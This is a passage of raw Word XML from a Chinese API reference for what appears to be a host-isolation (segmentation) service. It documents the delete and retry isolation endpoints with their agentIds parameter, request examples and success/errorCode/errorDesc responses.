    <w:p w14:paraId="5924D0CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746AEB50"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3770012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4D247A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5213F1F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62357255" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DD3F921" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE9A3BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="443B70B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="375EE069" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="663BDB14" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="580950C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="786D1B23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CB7120B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D007A28" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2150791E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27432820" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56671E41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="265B2281" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="431" w:name="_Toc115166288"/>
      <w:bookmarkStart w:id="432" w:name="删除隔离接口"/>
      <w:bookmarkEnd w:id="430"/>
      <w:r>
        <w:t>删除隔离接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="431"/>
    </w:p>
    <w:p w14:paraId="11477DC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB085F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/segmentation/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>realDel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="550F622A"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630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1284"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3DAE28C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A35C996" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C8361A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2745F533" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41DC5B7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09DA4E72" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5ED20D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19AD1750" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="206422B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C93B6D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机Id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="170013F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A3561" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AEBDDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B63887" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA34ED6"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3BDDC63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6143FA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11DA062B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="742B4AB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68579A08" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="460AECE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C2F0C1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23F0CF90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C65A47B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03BD1321" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="079393E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="439D1619" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="207C290D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6263F5FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FE12675" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B8D22C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="563F9BD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="433" w:name="_Toc115166289"/>
      <w:bookmarkStart w:id="434" w:name="重试接口隔离接口"/>
      <w:bookmarkEnd w:id="432"/>
      <w:r>
        <w:t>重试接口隔离接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="433"/>
    </w:p>
    <w:p w14:paraId="614A187D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729A52A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/segmentation/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>retry</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2561589D"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630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1284"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="09004D5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2913C67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38C70C31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="472B864C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BCBEAEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E65E08B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BA46C01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DD05B4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D4B530A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DBD9E12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机Id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="056423B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBA060E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14872F3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212BFD38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9E20D1"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="542EB2B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05DB2BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="059EDB13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A471649" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B0FC42C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E8A8879" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43A23EB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="424C7ACC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23A0FAB7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E57A36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C8E6C97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
